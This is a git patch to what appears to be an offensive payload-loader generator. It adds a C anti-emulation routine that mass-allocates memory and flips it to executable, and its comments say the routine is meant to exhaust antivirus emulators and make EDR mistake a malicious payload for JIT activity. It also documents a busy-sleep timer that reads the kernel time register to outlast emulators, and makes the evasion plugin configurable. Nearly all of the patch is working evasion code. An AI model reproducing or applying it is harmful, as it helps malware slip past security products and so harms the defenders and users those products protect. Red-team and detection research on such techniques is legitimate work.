From 85585e598e242c601c10857f6675931d3af2661a Mon Sep 17 00:00:00 2001
From: Dobin Rutishauser <dobin.rutishauser@gmail.com>
Date: Mon, 10 Jun 2024 09:02:37 +0200
Subject: [PATCH] refactor: prepare antiemulation more modular

---
 .../carrier/antiemulation/sirallocalot.c      | 47 +++++++++++++++++++
 data/source/carrier/antiemulation/timeraw.c   | 10 ++++
 model/settings.py                             |  1 +
 phases/templater.py                           |  6 ++-
 4 files changed, 62 insertions(+), 2 deletions(-)
 create mode 100644 data/source/carrier/antiemulation/sirallocalot.c

diff --git a/data/source/carrier/antiemulation/sirallocalot.c b/data/source/carrier/antiemulation/sirallocalot.c
new file mode 100644
index 0000000..766bcee
--- /dev/null
+++ b/data/source/carrier/antiemulation/sirallocalot.c
@@ -0,0 +1,47 @@
+
+#define ALLOC_NUM 256
+
+
+/* This will allocate ALLOC_NUM RW memory regions, 
+     set them to RX, and free them 
+
+    The idea is that the AV emulator will probably give up, either because
+    of used memory is above maximum, or amount of instructions, or 
+    number of API calls, or time. 
+
+    It hopefully also makes the EDR think this program is doing some
+    kind of interpreter or JIT compilation, and not a malicious payload.
+*/
+
+void antiemulation() {
+    void* allocs[ALLOC_NUM];
+    DWORD result;
+
+    for(int n=0; n<ALLOC_NUM; n++) {
+        allocs[n] = VirtualAlloc(
+            NULL, 
+            0x1000, 
+            0x3000, 
+            p_RW
+        );
+    }
+
+    for(int n=0; n<ALLOC_NUM; n++) {
+        if (VirtualProtect(
+            allocs[n], 
+            1000, 
+            p_RX, 
+            &result) == 0) 
+        {
+            return 7;
+        }
+    }
+
+    BOOL bSuccess;
+    for(int n=0; n<ALLOC_NUM; n++) {
+        bSuccess = VirtualFree(
+                        allocs[n],
+                        1000,
+                        0x00008000); // MEM_RELEASE
+    }
+}
diff --git a/data/source/carrier/antiemulation/timeraw.c b/data/source/carrier/antiemulation/timeraw.c
index 25cb454..680d406 100644
--- a/data/source/carrier/antiemulation/timeraw.c
+++ b/data/source/carrier/antiemulation/timeraw.c
@@ -1,4 +1,14 @@
 
+
+/* Busy sleep with time register
+
+    This function will busy sleep for the given amount of time.
+    It uses the kernel time register, which is not affected by
+    the sleep function (memory address 0x7ffe0004).
+
+    This may defeat the AV emulator (maximum time).
+*/
+
 int get_time_raw() {
     ULONG* PUserSharedData_TickCountMultiplier = (PULONG)0x7ffe0004;
     LONG* PUserSharedData_High1Time = (PLONG)0x7ffe0324;
diff --git a/model/settings.py b/model/settings.py
index a9af17d..4bc4c99 100644
--- a/model/settings.py
+++ b/model/settings.py
@@ -13,6 +13,7 @@ class Settings():
         self.carrier_name: str = ""
         self.decoder_style: DecoderStyle = DecoderStyle.XOR_1
         self.short_call_patching: bool = False
+        self.antiemulation = "timeraw"
 
         self.dllfunc: str = ""  # For DLL injection
 
diff --git a/phases/templater.py b/phases/templater.py
index 12414f6..9596fb4 100644
--- a/phases/templater.py
+++ b/phases/templater.py
@@ -28,7 +28,8 @@ def create_c_from_template(settings: Settings, payload_len: int):
     plugin_decoder = ""
 
     # Decoder
-    filepath_decoder = PATH_DECODER + "{}.c".format(settings.decoder_style.value)
+    filepath_decoder = PATH_DECODER + "{}.c".format(
+        settings.decoder_style.value)
     with open(filepath_decoder, "r", encoding='utf-8') as file:
         plugin_decoder = file.read()
         plugin_decoder = Template(plugin_decoder).render({
@@ -38,7 +39,8 @@ def create_c_from_template(settings: Settings, payload_len: int):
         })
 
     # Anti-Emulation
-    filepath_antiemulation = PATH_ANTIEMULATION + "{}.c".format("timeraw")
+    filepath_antiemulation = PATH_ANTIEMULATION + "{}.c".format(
+        settings.antiemulation)
     with open(filepath_antiemulation, "r", encoding='utf-8') as file:
         plugin_antiemualation = file.read()